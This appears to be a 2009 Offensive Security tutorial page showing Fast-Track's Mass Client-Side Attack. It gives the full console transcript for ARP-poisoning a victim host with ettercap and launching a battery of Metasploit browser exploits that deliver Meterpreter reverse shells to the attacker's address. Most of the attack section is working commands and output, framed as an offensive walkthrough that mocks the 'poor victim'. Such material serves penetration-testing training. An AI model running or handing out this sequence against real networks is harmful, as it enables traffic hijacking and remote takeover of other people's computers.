Notification:  

Add   Edit   Delete   Sort   Print   Change Password   Settings   Permissions

Mass-Client Attack

Fast-Track's 'Mass Client-Side Attack' is similar in nature to Metasploit's db_autopwn. When a user connects to your malicious website, a slew of both custom exploits developed in Fast-Track and the army of exploits in Metasploit's repository will be launched at the client. One thing to add is that you can also use ARP cache poisoning with ettercap in order to force the victim to your site! Let's try this out.

Fast-Track Main Menu:

Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com

1. Fast-Track Updates
2. Autopwn Automation
3. Microsoft SQL Tools
4. Mass Client-Side Attack
5. Exploits
6. Binary to Hex Payload Converter
7. Payload Generator
8. Fast-Track Tutorials
9. Fast-Track Changelog
10. Fast-Track Credits
11. Exit

Enter the number: 4

Metasploit path not defined, you should run setup.py, using the default for now...

Mass Client Client Attack

Requirements: PExpect

Metasploit has a bunch of powerful client-side attacks available in
its arsenal. This simply launches all client side attacks within
Metasploit through msfcli and starts them on various ports
and starts a custom HTTP server for you, injects a new index.html
file, and puts all of the exploits in iframes.

If you can get someone to connect to this web page, it will basically
brute force various client side exploits in the hope one succeeds.
You'll have to monitor each shell if one succeeds.. Once finished,
just have someone connect to port 80 for you and if they are vulnerable
to any of the exploits...should have a nice shell.


Enter the IP Address you want the web server to listen on: 10.211.55.130

Specify your payload:

1. Windows Meterpreter Reverse Meterpreter
2. Generic Bind Shell
3. Windows VNC Inject Reverse_TCP (aka "Da Gui")
4. Reverse TCP Shell

Enter the number of the payload you want: 1

Would you like to use ettercap to ARP poison a host yes or no: yes

Ettercap allows you to ARP poison a specific host and when they browse
a site, force them to use the metasploit site and launch a slew of
exploits from the Metasploit repository. ETTERCAP REQUIRED.


What IP Address do you want to poison: 10.211.55.128
Setting up the ettercap filters....
Filter created...
Compiling Ettercap filter...

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file 'bin/appdata/fasttrack.filter' done.

Unfolding the meta-tree done.

Converting labels to real offsets done.

Writing output to 'bin/appdata/fasttrack.ef' done.

-> Script encoded into 16 instructions.

Filter compiled...Running Ettercap and poisoning target...
Setting up Metasploit MSFConsole with various exploits...
If an exploit succeeds, type sessions -l to list shells and sessions -i
to interact...


Have someone connect to you on port 80...

Launching MSFConsole and Exploits...

Once you see the Metasploit Console launch all the exploits have someone
connect to you..
SRVPORT => 8072
resource> set URIPATH /
URIPATH => /
resource> set LPORT 9072
LPORT => 9072
resource> exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Exploit running as background job.
resource> use exploit/windows/browser/zenturiprogramchecker_unsafe
[*] Started reverse handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8071/
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 10.211.55.130
LHOST => 10.211.55.130
[*] Local IP: http://10.211.55.130:8071/
resource> set SRVPORT 8073
[*] Server started.
SRVPORT => 8073
resource> set URIPATH /
URIPATH => /
resource> set LPORT 9073
LPORT => 9073
resource> exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8072/
[*] Local IP: http://10.211.55.130:8072/
[*] Server started.
msf exploit(zenturiprogramchecker_unsafe) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8073/
[*] Local IP: http://10.211.55.130:8073/
[*] Server started.

At this point when our poor victim at 10.211.55.128 goes to browse ANY website, all the hrefs will be replaced with our website address. Check it out below.






© Offensive Security 2009